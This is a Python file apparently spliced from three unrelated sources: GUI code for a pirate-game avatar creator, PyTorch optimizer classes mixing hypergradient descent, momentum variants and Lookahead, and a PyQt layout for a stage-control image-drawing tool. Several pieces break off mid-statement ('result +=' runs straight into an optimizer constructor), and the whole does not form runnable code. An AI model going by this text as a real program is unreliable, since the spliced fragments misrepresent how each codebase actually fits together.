def hidePageTabs(self):
if self.currPageTabIndex == BODYSHOP:
self.exitBodyShop()
elif self.currPageTabIndex == HEADSHOP:
self.exitHeadShop()
elif self.currPageTabIndex == MOUTHSHOP:
self.exitMouthShop()
elif self.currPageTabIndex == EYESSHOP:
self.exitEyesShop()
elif self.currPageTabIndex == NOSESHOP:
self.exitNoseShop()
elif self.currPageTabIndex == EARSHOP:
self.exitEarShop()
elif self.currPageTabIndex == HAIRSHOP:
self.exitHairShop()
elif self.currPageTabIndex == CLOTHESSHOP:
self.exitClothesShop()
elif self.currPageTabIndex == NAMESHOP:
self.exitNameShop()
elif self.currPageTabIndex == TATTOOSHOP:
self.exitTattoosShop()
elif self.currPageTabIndex == JEWELRYSHOP:
self.exitJewelryShop()
for i in range(0, len(self.pageTabs)):
self.pageTabs[i].hide()
def handleRandomAll(self):
self.overwriteCurrentUndo()
self.inRandomAll = True
if self.avatarType == AVATAR_PIRATE:
count = self.currPageIndex + 1
page = self.currPageIndex
self.setPage(PLocalizer.MakeAPiratePageNames[0])
self.makeRandomBody()
self.setPage(PLocalizer.MakeAPiratePageNames[1])
self.makeRandomHead()
self.setPage(PLocalizer.MakeAPiratePageNames[2])
self.makeRandomMouth()
self.setPage(PLocalizer.MakeAPiratePageNames[3])
self.makeRandomEyes()
self.setPage(PLocalizer.MakeAPiratePageNames[4])
self.makeRandomNose()
self.setPage(PLocalizer.MakeAPiratePageNames[5])
self.makeRandomEar()
self.setPage(PLocalizer.MakeAPiratePageNames[6])
self.makeRandomHair()
self.setPage(PLocalizer.MakeAPiratePageNames[7])
self.makeRandomClothing()
self.setPage(PLocalizer.MakeAPiratePageNames[8])
self.makeRandomName()
self.setPage(PLocalizer.MakeAPiratePageNames[page])
idx = 0
if self.pirate.gender == 'f':
idx = 1
optionsLeft = len(self.JSD_ANYTIME[idx])
if optionsLeft and random.choice([
0,
1,
2,
3]) == 1:
if self.lastDialog:
self.lastDialog.stop()
choice = random.choice(range(0, optionsLeft))
dialog = self.JSD_ANYTIME[idx][choice]
base.playSfx(dialog)
self.lastDialog = dialog
self.JSD_ANYTIME[idx].remove(dialog)
elif self.avatarType == AVATAR_SKELETON:
self.NPCGui.randomPick()
elif self.avatarType == AVATAR_NAVY:
if self.shop == BODYSHOP:
self.makeRandomBody()
self.makeRandomHead()
self.makeRandomHair()
elif self.shop == HEADSHOP:
self.makeRandomHead()
elif self.shop == HAIRSHOP:
self.makeRandomHair()
self.inRandomAll = False
self.appendUndo()
self.undoLevel[self.pirate.style.gender] = len(self.undoList[self.pirate.style.gender]) - 1
def handleQuarterView(self, extraArgs):
hpr = self.pirate.getHpr()
if extraArgs != None:
hCam = self.pirate.getH(camera)
rotX = hpr[0]
fudge = self.initH
if self.isNPCEditor:
fudge = 0
if hCam < 0:
if hCam >= -180:
rotX = fudge + 45
elif hCam <= 180:
rotX = fudge - 45
self.pirate.setHpr(rotX, hpr[1], hpr[2])
else:
self.pirate.setHpr(self.lastRot, hpr[1], hpr[2])
def enableRandom(self):
self.guiRandomButton['state'] = 'normal'
self.guiRandomButton.setColorScale(Vec4(1, 1, 1, 1))
def disableRandom(self):
self.guiRandomButton['state'] = 'disabled'
self.guiRandomButton.setColorScale(Vec4(0.3, 0.3, 0.3, 1))
def storeUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
self.undoList[gender] = self.undoList[gender][:self.undoLevel[gender] + 1]
self.undoClothing[gender] = self.undoClothing[gender][:self.undoLevel[gender] + 1]
self.undoLevel[gender] += 1
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender].append(h)
self.undoClothing[gender].append(copy.copy(self.pirate.model.currentClothing))
def undo(self):
self.boundUndo()
def redo(self):
self.boundRedo()
def overwriteCurrentUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender][self.undoLevel[gender]] = h
self.undoClothing[gender][self.undoLevel[gender]] = copy.copy(self.pirate.model.currentClothing)
def appendUndo(self):
gender = self.pirate.style.gender
self.bodyGui.save()
self.headGui.save()
self.clothesGui.save()
self.hairGui.save()
h = HumanDNA.HumanDNA()
h.copy(self.pirate.style)
self.undoList[gender].append(h)
self.undoClothing[gender].append(copy.copy(self.pirate.model.currentClothing))
self.prevShuffleButton['state'] = DGG.NORMAL
if self.undoLevel[gender] == len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.DISABLED
def boundUndo(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.overwriteCurrentUndo()
self.pirate.style.copy(self.undoList[gender][self.undoLevel[gender] - 1])
self.pirate.model.currentClothing = self.undoClothing[gender][self.undoLevel[gender] - 1]
self.undoLevel[gender] -= 1
self.refresh()
if self.undoLevel[gender] == 0:
self.prevShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] < len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.NORMAL
def boundRedo(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.overwriteCurrentUndo()
if self.undoLevel[gender] < listLen - 1:
self.pirate.style = HumanDNA.HumanDNA()
self.pirate.style.copy(self.undoList[gender][self.undoLevel[gender] + 1])
self.pirate.style = self.pirate.style
self.pirate.model.currentClothing = self.undoClothing[gender][self.undoLevel[gender] + 1]
self.undoLevel[gender] += 1
self.refresh()
if self.undoLevel[gender] == len(self.undoList[gender]) - 1:
self.nextShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] > 0:
self.prevShuffleButton['state'] = DGG.NORMAL
def refreshShuffleButtons(self):
gender = self.pirate.style.gender
listLen = len(self.undoList[gender])
self.prevShuffleButton['state'] = DGG.DISABLED
self.nextShuffleButton['state'] = DGG.DISABLED
if self.undoLevel[gender] < listLen - 1:
self.nextShuffleButton['state'] = DGG.NORMAL
if self.undoLevel[gender] > 0:
self.prevShuffleButton['state'] = DGG.NORMAL
def receivedRelease(self, pgs, extraStuff):
if self.guiIdStates[pgs.guiId] != pgs['value']:
self.guiIdStates[pgs.guiId] = pgs['value']
if not self.compositeAction:
self.storeUndo()
def receivedAdjust(self, pgs):
self.guiIdStates[pgs.guiId] = 1
def trackSliderElement(self, element):
guiId = element.guiId
thumbId = element.thumb.guiId
self.guiIdStates[guiId] = element['value']
self.accept('release-mouse1-%s' % guiId, self.receivedRelease, extraArgs = [
element])
self.accept('release-mouse1-%s' % thumbId, self.receivedRelease, extraArgs = [
element])
def startCompositeAction(self):
self.compositeAction = 1
def endCompositeAction(self):
self.compositeAction = 0
self.storeUndo()
def refresh(self, needToRefresh = True, wantClothingChange = False):
currentClothing = self.pirate.model.currentClothing
self.pirate.setDNA(self.pirate.style)
self.pirate.generateHuman(self.pirate.style.gender)
self.pirate.model.currentClothing = currentClothing
if self.isNPCEditor or self.wantNPCViewer:
self.pirate.disableBlend()
self.pirate.model.setupSelectionChoices('NPC')
else:
self.pirate.model.setupSelectionChoices('DEFAULT')
self.placePirate(wantClothingChange)
self.bodyGui.restore(needToRefresh)
self.headGui.restore()
self.clothesGui.restore()
def playJackDialogOnClothes(self, clothesType):
if self.inRandomAll:
return None
choice = random.choice(range(12))
if choice != 0:
return None
optionsLeft = len(self.JSD_CLOTHING[self.pirate.gender][clothesType])
if optionsLeft:
if self.lastDialog:
if self.lastDialog.status() == AudioSound.PLAYING:
return None
choice = random.choice(range(0, optionsLeft))
dialog = self.JSD_CLOTHING[self.pirate.gender][clothesType][choice]
base.playSfx(dialog)
self.lastDialog = dialog
self.JSD_CLOTHING[self.pirate.gender][clothesType].remove(dialog)
def refreshAnim(self, needToRefresh = True):
if needToRefresh:
self.handleSetAnim(AnimList[self.lastAnim], needToRefresh = False)
else:
self.pirate.loop(AnimList[self.lastAnim])
def marketingOn(self):
if self.entered and self.wantMarketingViewer:
self.guiTopBar.show()
self.PirateButton.hide()
self.NPCButton.hide()
self.NavyButton.hide()
def marketingOff(self):
if self.entered and self.wantMarketingViewer:
self.guiTopBar.hide()
def toggleGUI(self):
render2d.toggleVis()
self.pirate.findAllMatches('**/drop*').getPath(1).toggleVis()
def updateFilter(self, arg = None):
if self.isNPCEditor or self.wantNPCViewer:
avatarType = 'NPC'
else:
avatarType = 'DEFAULT'
versionFilterStr = self.filterVersionMenu.get()
if versionFilterStr == 'All':
versionFilter = None
else:
versionFilter = eval('ItemGlobals.' + versionFilterStr)
rarityFilterStr = self.filterRarityMenu.get()
if rarityFilterStr == 'All':
rarityFilter = None
else:
rarityFilter = eval('ItemGlobals.' + rarityFilterStr)
isFromLoot = self.filterUsageLootButton['relief'] == DGG.SUNKEN
if arg == 'Loot':
isFromLoot = not isFromLoot
self.filterUsageLootButton['relief'] = abs(self.filterUsageLootButton['relief'] - 3) + 2
isFromShop = self.filterUsageShopButton['relief'] == DGG.SUNKEN
if arg == 'Shop':
isFromShop = not isFromShop
self.filterUsageShopButton['relief'] = abs(self.filterUsageShopButton['relief'] - 3) + 2
isFromQuest = self.filterUsageQuestButton['relief'] == DGG.SUNKEN
if arg == 'Quest':
isFromQuest = not isFromQuest
self.filterUsageQuestButton['relief'] = abs(self.filterUsageQuestButton['relief'] - 3) + 2
isFromPromo = self.filterUsagePromoButton['relief'] == DGG.SUNKEN
if arg == 'Promo':
isFromPromo = not isFromPromo
self.filterUsagePromoButton['relief'] = abs(self.filterUsagePromoButton['relief'] - 3) + 2
isFromPVP = self.filterUsagePvpButton['relief'] == DGG.SUNKEN
if arg == 'Pvp':
isFromPVP = not isFromPVP
self.filterUsagePvpButton['relief'] = abs(self.filterUsagePvpButton['relief'] - 3) + 2
isFromNPC = self.filterUsageNpcButton['relief'] == DGG.SUNKEN
if arg == 'Npc':
isFromNPC = not isFromNPC
self.filterUsageNpcButton['relief'] = abs(self.filterUsageNpcButton['relief'] - 3) + 2
holidayFilterStr = self.filterHolidayMenu.get()
if holidayFilterStr == 'All':
holidayFilter = None
else:
holidayFilter = CATALOG_HOLIDAYS[holidayFilterStr]
self.clothesGui.avatar.setupSelectionChoices(avatarType, versionFilter, rarityFilter, isFromLoot, isFromShop, isFromQuest, isFromPromo, isFromPVP, isFromNPC, holidayFilter)
self.clothesGui.checkCurrentClothing()
def printFilteredChoices(self):
avatar = self.clothesGui.avatar
versionFilterStr = self.filterVersionMenu.get()
rarityFilterStr = self.filterRarityMenu.get()
holidayFilterStr = self.filterHolidayMenu.get()
isFromLoot = self.filterUsageLootButton['relief'] == DGG.SUNKEN
isFromShop = self.filterUsageShopButton['relief'] == DGG.SUNKEN
isFromQuest = self.filterUsageQuestButton['relief'] == DGG.SUNKEN
isFromPromo = self.filterUsagePromoButton['relief'] == DGG.SUNKEN
isFromPVP = self.filterUsagePvpButton['relief'] == DGG.SUNKEN
isFromNPC = self.filterUsageNpcButton['relief'] == DGG.SUNKEN
result = 'Version:%s Rarity:%s Loot:%s Shop:%s Quest:%s Promo:%s PVP:%s NPC:%s Holiday:%s' % (versionFilterStr, rarityFilterStr, isFromLoot, isFromShop, isFromQuest, isFromPromo, isFromPVP, isFromNPC, holidayFilterStr)
for clothesType in [
'HAT',
'SHIRT',
'VEST',
'COAT',
'BELT',
'PANT',
'SHOE']:
result += '\n\n%s\n' % clothesType
for itemId in avatar.choices[clothesType].keys():
if itemId == 0:
continue
modelId = avatar.choices[clothesType][itemId][0]
textureId = avatar.choices[clothesType][itemId][1]
textureName = avatar.getTextureName(clothesType, modelId, textureId)
if textureName is not None:
result +=
super(HyperRangerMod, self).__init__(params, defaults)
def __setstate__(self, state):
super(HyperRangerMod, self).__setstate__(state)
def step(self, display=False, activate_IA=False, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError(
'HyperRangerMod does not support sparse gradients')
state = self.state[p]
hypergrad_lr = group['hypergrad_lr']
beta1_init, beta2, beta3 = group['betas']
nu1, nu2 = group['nus']
wd = group['weight_decay']
alpha = group['alpha']
gamma = group['gamma']
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
if self.use_diffgrad:
state['previous_grad'] = torch.zeros_like(p.data)
state['lr'] = group['lr']
if self.IA:
state['num_models'] = 0
if self.IA or self.k > 0:
state['cached_params'] = p.data.clone()
if beta3 > 0.0:
state['n_avg'] = torch.zeros_like(p.data)
if self.nostalgia:
state['B_old'] = 0
state['B_new'] = 1
if hypergrad_lr > 0.0:
state['cached_hypergrad_comp'] = torch.zeros_like(
grad.view(-1))
state['step'] += 1
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if self.use_demon:
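# DEMON (Decaying Momentum): beta1 decays from beta1_init towards 0 as step approaches the horizon T.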
temp = 1 - (state['step'] / self.T)
beta1 = beta1_init * temp / \
((1 - beta1_init) + beta1_init * temp)
else:
beta1 = beta1_init
if self.nostalgia:
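# NosAdam-style beta2: at step t, beta2 = B_{t-1} / B_t with B_t = sum_{k<=t} k^(-gamma), giving relatively more weight to older squared gradients.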
beta2 = state['B_old'] / state['B_new']
state['B_old'] += math.pow(state['step'], -gamma)
state['B_new'] += math.pow(state['step'] + 1, -gamma)
do_IA = False
lookahead_step = False
if self.IA and activate_IA:
lookahead_step = False
if state['step'] % self.IA_cycle == 0:
do_IA = True
elif self.k == 0:
lookahead_step = False
else:
if state['step'] % self.k == 0:
lookahead_step = True
else:
lookahead_step = False
if state['step'] > 1 and hypergrad_lr > 0.0:
du = state['cached_hypergrad_comp']
h = torch.dot(grad.view(-1), du)
state['lr'] -= hypergrad_lr * h
torch.max(state['lr'], torch.zeros_like(
state['lr']), out=state['lr'])
if display:
print(state['lr'])
if self.use_gc and grad.dim() > 1:
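# Gradient centralization: subtract the mean over all dimensions except dim 0, centering each filter's gradient.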
grad.add_(-grad.mean(dim=tuple(range(1, grad.dim())), keepdim=True))
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
if self.use_diffgrad:
previous_grad = state['previous_grad']
diff = abs(previous_grad - grad)
dfc = 1. / (1. + torch.exp(-diff))
state['previous_grad'] = grad.clone()
exp_avg = exp_avg * dfc
momentum = exp_avg.clone()
momentum.div_(
1 - (beta1 ** state['step'])).mul_(nu1).add_(1 - nu1, grad)
vt = exp_avg_sq.clone()
if not self.nostalgia:
vt.div_(1 - (beta2 ** state['step']))
if nu2 != 1.0:
vt.mul_(nu2).addcmul_(1 - nu2, grad, grad)
if group['p'] != 1.0:
denom = vt.pow_(group['p']).add_(group['eps'])
else:
denom = vt
n = state['lr'] / denom
if beta3 > 0.0: # apply AdaMod
n_avg = state['n_avg']
n_avg.mul_(beta3).add_(1 - beta3, n)
if self.AdaMod_bias_correct:
n_avg_ = n_avg.clone()
bias_correction3 = 1 - (beta3 ** state['step'])
n_avg_.div_(bias_correction3)
torch.min(n, n_avg_, out=n)
else:
torch.min(n, n_avg, out=n)
if group['dropout'] > 0.0:
mask = torch.bernoulli(
torch.ones_like(p.data) - group['dropout'])
n = n * mask
p.data.add_(-n * momentum)
if lookahead_step:
dalpha = alpha
elif do_IA:
dalpha = (1 / (state["num_models"] + 1.0))
else:
dalpha = 1.0
if hypergrad_lr > 0.0:
if beta3 > 0.0:
grad_from_n = dalpha * \
(-(momentum / denom) - wd * p.data)
if self.AdaMod_bias_correct:
grad_from_n_avg_ = dalpha * \
(-((1 - beta3) / bias_correction3)
* (momentum / denom) - wd * p.data)
du = torch.where(n_avg_ < n,
grad_from_n_avg_,
grad_from_n)
else:
grad_from_n_avg = dalpha * \
(-(1 - beta3) * (momentum / denom) - wd * p.data)
du = torch.where(n_avg < n,
grad_from_n_avg,
grad_from_n)
else:
du = dalpha * (-(momentum / denom) - wd * p.data)
state['cached_hypergrad_comp'] = du.view(-1)
if wd != 0:
p.data.add_(-wd * state['lr'], p.data)
if lookahead_step:
p.data.mul_(alpha).add_(
1.0 - alpha, state['cached_params'])
state['cached_params'].copy_(p.data)
if do_IA:
p.data.add_(state["num_models"], state['cached_params']
).div_(state["num_models"] + 1.0)
state['cached_params'].copy_(p.data)
state["num_models"] += 1
return loss
class HDQHSGDW(Optimizer):
def __init__(self, params, lr=1e-3,
beta=0.999,
nu=0.7,
hypergrad_lr=1e-3,
HDM=False,
k=5,
alpha=0.5,
eps=1e-8,
weight_decay=0,
use_gc=True,
use_diffgrad=False):
# BASIC SGD + Momentum but with QHMomentum and Hypergradient descent over all beta, lr, and nu + Lookahead and decorrelated weight decay
# they say the best of them all is still SGD + Momentum?
# use_diffgrad = bool to determine whether to use diffgrad or not.
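# Quasi-hyperbolic momentum (roughly): update direction = (1 - nu) * grad + nu * bias-corrected momentum, as used in step() below.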
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= hypergrad_lr:
raise ValueError(
"Invalid hypergradient learning rate: {}".format(hypergrad_lr))
if not 0.0 <= beta < 1.0:
raise ValueError("Invalid beta parameter: {}".format(beta))
if not 0.0 <= nu <= 1.0:
raise ValueError("Invalid nu parameter: {}".format(nu))
if not 0.0 <= alpha < 1.0:
raise ValueError("Invalid alpha parameter: {}".format(alpha))
self.k = k
self.use_gc = use_gc
self.use_diffgrad = use_diffgrad
self.HDM = HDM
defaults = dict(lr=lr,
beta=beta,
nu=nu,
alpha=alpha,
hypergrad_lr=hypergrad_lr,
eps=eps,
weight_decay=weight_decay)
super(HDQHSGDW, self).__init__(params, defaults)
def __setstate__(self, state):
super(HDQHSGDW, self).__setstate__(state)
def hyperupdate(self, update, grad, grad_comp, hypergrad_lr, eps):
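# Hypergradient descent: h = <current grad, d(update)/d(hyperparam) cached from the previous step>;
# the additive form does hyperparam -= hypergrad_lr * h, while HDM uses the normalized multiplicative form below.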
h = torch.dot(grad.view(-1), grad_comp)
if self.HDM:
grad_norm = grad.view(-1).norm()
norm_denom = grad_norm * (grad_comp.norm())
norm_denom.add_(eps)
update = update * (1 - hypergrad_lr * (h / norm_denom))
else:
update -= hypergrad_lr * h
return update
def step(self, display=False, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError(
'HDQHSGDW does not support sparse gradients')
state = self.state[p]
hypergrad_lr = group['hypergrad_lr']
wd = group['weight_decay']
alpha = group['alpha']
if len(state) == 0:
state['step'] = 0
state['lr'] = group['lr']
state['nu'] = group['nu']
state['beta'] = group['beta']
state['exp_avg'] = torch.zeros_like(p.data)
if self.use_diffgrad:
state['previous_grad'] = torch.zeros_like(p.data)
if self.k > 0:
state['cached_params'] = p.data.clone()
if hypergrad_lr > 0.0:
state['prev_lr_grad'] = torch.zeros_like(grad.view(-1))
state['prev_nu_grad'] = torch.zeros_like(grad.view(-1))
state['prev_beta_grad'] = torch.zeros_like(
grad.view(-1))
state['step'] += 1
exp_avg = state['exp_avg']
if self.use_diffgrad:
previous_grad = state['previous_grad']
diff = abs(previous_grad - grad)
dfc = 1. / (1. + torch.exp(-diff))
state['previous_grad'] = grad.clone()
exp_avg = exp_avg * dfc
lookahead_step = False
if self.k == 0:
lookahead_step = False
else:
if state['step'] % self.k == 0:
lookahead_step = True
else:
lookahead_step = False
if state['step'] > 1 and hypergrad_lr > 0.0:
prev_lr_grad = state['prev_lr_grad']
prev_beta_grad = state['prev_beta_grad']
prev_nu_grad = state['prev_nu_grad']
state['lr'] = self.hyperupdate(update=state['lr'],
grad=grad,
grad_comp=prev_lr_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['lr'], torch.zeros_like(
state['lr']), out=state['lr'])
if display:
print("lr", state['lr'])
state['beta'] = self.hyperupdate(update=state['beta'],
grad=grad,
grad_comp=prev_beta_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['beta'], torch.zeros_like(
state['beta']), out=state['beta'])
torch.min(state['beta'], torch.ones_like(
state['beta']), out=state['beta'])
if display:
print("beta", group['beta'])
state['nu'] = self.hyperupdate(update=state['nu'],
grad=grad,
grad_comp=prev_nu_grad,
hypergrad_lr=hypergrad_lr,
eps=group['eps'])
torch.max(state['nu'], torch.zeros_like(
state['nu']), out=state['nu'])
torch.min(state['nu'], torch.ones_like(
state['nu']), out=state['nu'])
if display:
print("nu", state['nu'])
if self.use_gc and grad.dim() > 1:
grad.add_(-grad.mean(dim=tuple(range(1, grad.dim())), keepdim=True))
nu = state['nu']
beta = state['beta']
lr = state['lr']
if lookahead_step:
dalpha = alpha
else:
dalpha = 1.0
gx = 1 - (beta ** state['step'])
fx = beta * exp_avg + (1 - beta) * grad
if hypergrad_lr > 0.0:
dfx = exp_avg - grad
dgx = - state['step'] * beta**(state['step'] - 1)
dbeta = (gx * dfx + fx * dgx) / \
(math.pow(gx, 2) + group['eps'])
dbeta = - dalpha * lr * nu * dbeta
state['prev_beta_grad'] = dbeta.view(-1)
momentum = fx / gx
state['exp_avg'] = fx
if hypergrad_lr > 0.0:
state['prev_nu_grad'] = (-dalpha *
lr * (momentum - grad)).view(-1)
# quasi hyperbolic momentum
momentum.mul_(nu).add_(1 - nu, grad)
if hypergrad_lr > 0.0:
temp = dalpha * (-momentum - wd * p.data)
state['prev_lr_grad'] = temp.view(-1)
p.data.add_(-lr * momentum)
if wd != 0:
p.data.add_(-wd * lr, p.data)
if lookahead_step:
p.data.mul_(alpha).add_(
1.0 - alpha, state['cached_params'])
state['cached_params'].copy_(p.data)
return loss
class HyperProp(Optimizer):
# LaProp + hypergradient descent on lr and nu (for QH momentum) + QH Momentum + Decaying Momentum (DEMON) + Lookahead + Iterate Averaging + Nostalgia (from NosAdam) + P from PAdam
# + gradient centralization + weight decay
def __init__(self, params, lr=1e-3,
betas=(0.999, 0.999),
nu=0.7,
eps=1e-8,
gamma=0.0001,
nostalgia=True,
use_demon=True,
hypergrad_lr=0.02,
HDM=True,
hypertune_nu=True,
p=0.25,
k=5,
alpha=0.8,
IA=True,
IA_cycle=1000,
epochs=100,
step_per_epoch=None,
weight_decay=0,
use_gc=True,
use_diffgrad=False):
# betas = (beta1 for first order moments, beta2 for second order moments)
# nu = for quasi hyperbolic momentum
# eps = small value for numerical stability (avoid divide by zero)
# k = lookahead cycle
# alpha = outer learning rate (lookahead)
# gamma = used for nostalgia
# nostalgia = bool to decide whether to use nostalgia (from Nostalgic Adam or NosAdam)
# use_demon = bool to decide whether to use DEMON (Decaying Momentum) or not
# hypergrad_lr = learning rate for updating hyperparameters (like lr) through hypergradient descent (probably need to increase around 0.02 if HDM is True). Set to 0.0 to disable hypergradient descent.
# HDM = bool to decide whether to use the multiplicative (normalized) form of the hypergradient update
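# Rough sketch of the DEMON beta1 schedule referenced above (mirroring HyperRangerMod.step):
#   temp  = 1 - step / T
#   beta1 = beta1_init * temp / ((1 - beta1_init) + beta1_init * temp)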
0.4); }")
# / Summary
# Action Buttons
_AR_action_btns = QtWidgets.QWidget()
_AR_action_btns_layout = QtWidgets.QGridLayout()
# https://stackoverflow.com/a/33793752/3211506
_AR_action_btns_spacer = QtWidgets.QSpacerItem(0, 0, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self._AR_retToOri = QtWidgets.QCheckBox("Return to Origin")
self._AR_retToOri.setChecked(True)
self._AR_start = QtWidgets.QPushButton("START")
_AR_action_btns_layout.setColumnStretch(0, 0)
_AR_action_btns_layout.addItem(_AR_action_btns_spacer, 0, 0)
_AR_action_btns_layout.addWidget(self._AR_retToOri, 1, 0)
_AR_action_btns_layout.addWidget(self._AR_start, 2, 0)
_AR_action_btns.setLayout(_AR_action_btns_layout)
# / Action Buttons
# void QGridLayout::addWidget(QWidget *widget, int row, int column, Qt::Alignment alignment = Qt::Alignment())
# void QGridLayout::addWidget(QWidget *widget, int fromRow, int fromColumn, int rowSpan, int columnSpan, Qt::Alignment alignment = Qt::Alignment())
# Create Layout to add widgets
_AR_numrows = 5
_AR_numcols = 6
_array_raster_layout = QtWidgets.QGridLayout()
# Add widgets at position
_array_raster_layout.addWidget(_AR_initial_settings, 0, 0)
_array_raster_layout.addWidget(_right_dash, 0, 1)
_array_raster_layout.addWidget(_AR_X_interval_settings, 0, 2, 1, 2)
_array_raster_layout.addWidget(_right_arrow, 0, 4)
_array_raster_layout.addWidget(self._AR_X_final_settings, 0, 5)
_array_raster_layout.addWidget(_down_dash, 1, 0)
_array_raster_layout.addWidget(_AR_Y_interval_settings, 2, 0)
_array_raster_layout.addWidget(_down_arrow, 3, 0)
_array_raster_layout.addWidget(_AR_size, 1, 2, 2, 2)
_array_raster_layout.addWidget(_AR_summary, 4, 1, 1, 4)
_array_raster_layout.addWidget(self._AR_Y_final_settings, 4, 0)
_array_raster_layout.addWidget(self._AR_XY_final_settings, 4, 5)
_array_raster_layout.addWidget(_AR_action_btns, 2, 5)
# To ensure each row and column is the same width
# https://stackoverflow.com/a/40154349/3211506
# QGridLayout stretch factors must be ints: use 2 for the main rows/columns and 1 for the narrow spacer rows/columns
for i in range(_AR_numrows):
_array_raster_layout.setRowStretch(i, 2)
for j in range(_AR_numcols):
_array_raster_layout.setColumnStretch(j, 2)
_array_raster_layout.setColumnStretch(1, 1)
_array_raster_layout.setColumnStretch(4, 1)
_array_raster_layout.setRowStretch(1, 1)
_array_raster_layout.setRowStretch(3, 1)
# Velocities, comma separated
# Size
# Power, comma separated
return _array_raster_layout
# fourth layout
@make_widget_from_layout
def create_drawpic(self, widget):
_drawpic_layout = QtWidgets.QGridLayout()
# INSTRUCTION
# _DP_instructions = QtWidgets.QGroupBox("Instructions")
# _DP_instructions_layout = QtWidgets.QVBoxLayout()
_DP_instructions_scrollArea = QtWidgets.QScrollArea() # QTextBrowser
_DP_instructions_label = QtWidgets.QLabel()
_DP_instructions_string = [
"<b style='color: #22F;'>Instructions</b>",
"'Draw Picture' takes in a 1-bit BMP image and prints it out using the stage.",
"Each option has some hints on mouseover.",
"Go through each step <span style='font-family: Menlo, Consolas, monospace;'>[i]</span> sequentially to print the image. Each pixel represents 1 {}m.".format(self.MICROSYMBOL),
"Scale:<br>If x-scale = 2, this means that for every 1-pixel move along the x-direction the code sees, it moves 2{0}m along the x-direction. Generally, scale = beamspot-size in {0}m if x-scale = y-scale. Test and iterate to ensure.".format(self.MICROSYMBOL),
"Print a non-symmetrical image (e.g. <a href='{}'>fliptest.bmp</a>) to test whether the horizontal and vertical needs to be flipped. <span style='color: red;'>NOTE:</span> Flipping flips the image first before parsing its lines! To flip after, use a negative number as the scale.".format(os.path.join(root_dir, '1_runs', 'fliptest', 'fliptest.bmp')),
"The code will greedily search for the next pixel to the right of the current pixel to determine continuous lines. To prioritize searching the left pixel first, check 'Search left before right'."
]
_DP_instructions_label.setText("<br/><br/>".join(_DP_instructions_string))
_DP_instructions_label.setWordWrap(True)
_DP_instructions_label.setTextFormat(QtCore.Qt.RichText)
_DP_instructions_label.setTextInteractionFlags(QtCore.Qt.TextBrowserInteraction)
_DP_instructions_label.setOpenExternalLinks(True)
_DP_instructions_scrollArea.setBackgroundRole(QtGui.QPalette.Light)
_DP_instructions_scrollArea.setWidget(_DP_instructions_label)
_DP_instructions_scrollArea.setWidgetResizable(True)
# https://www.oipapio.com/question-3065786
# _DP_instructions_layout.addWidget(_DP_instructions_scrollArea)
# _DP_instructions.setLayout(_DP_instructions_layout)
# / INSTRUCTIONS
# DRAW PIC INTERFACE
_DP_main = QtWidgets.QGroupBox("Parameters")
_DP_main_layout = QtWidgets.QGridLayout()
# _DP_picture_fn_label = QtWidgets.QLabel("BMP File")
# _DP_picture_fn_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_picture_fn = QtWidgets.QLineEdit()
self._DP_picture_fn.setPlaceholderText("File name")
self._DP_picture_btn = QtWidgets.QPushButton("Browse...")
self._DP_picture_load = QtWidgets.QPushButton("Load")
self._DP_picture_preview = QtWidgets.QLabel("<i>Preview Here</i>")
self._DP_picture_preview.setStyleSheet("color: #777;")
self._DP_picture_preview.setAlignment(QtCore.Qt.AlignCenter)
# Options
# def __init__(self, filename, xscale = 1, yscale = 1, cut = 0, allowDiagonals = False, prioritizeLeft = False, flipHorizontally = False, flipVertically = False ,frames = False, simulate = False, simulateDrawing = False, micronInstance = None, shutterTime = 800)
_DP_options = QtWidgets.QWidget() # QGroupBox("Options")
_DP_options_layout = QtWidgets.QGridLayout()
_DP_xscale_label = QtWidgets.QLabel("X-Scale")
_DP_xscale_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_xscale = QtWidgets.QLineEdit("1")
# self._DP_xscale.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_xscale.setValidator(QtGui.QDoubleValidator())
self._DP_xscale.setToolTip("This is usually your beam spot size.")
_DP_yscale_label = QtWidgets.QLabel("Y-Scale")
_DP_yscale_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_yscale = QtWidgets.QLineEdit("1")
# self._DP_yscale.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_yscale.setValidator(QtGui.QDoubleValidator())
self._DP_yscale.setToolTip("This is usually your beam spot size.")
_DP_cutMode_label = QtWidgets.QLabel("Cut")
_DP_cutMode_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_cutMode = QtWidgets.QComboBox()
self._DP_cutMode.addItem("Black")
self._DP_cutMode.addItem("White")
self._DP_allowDiagonals = QtWidgets.QCheckBox("Allow Diagonals")
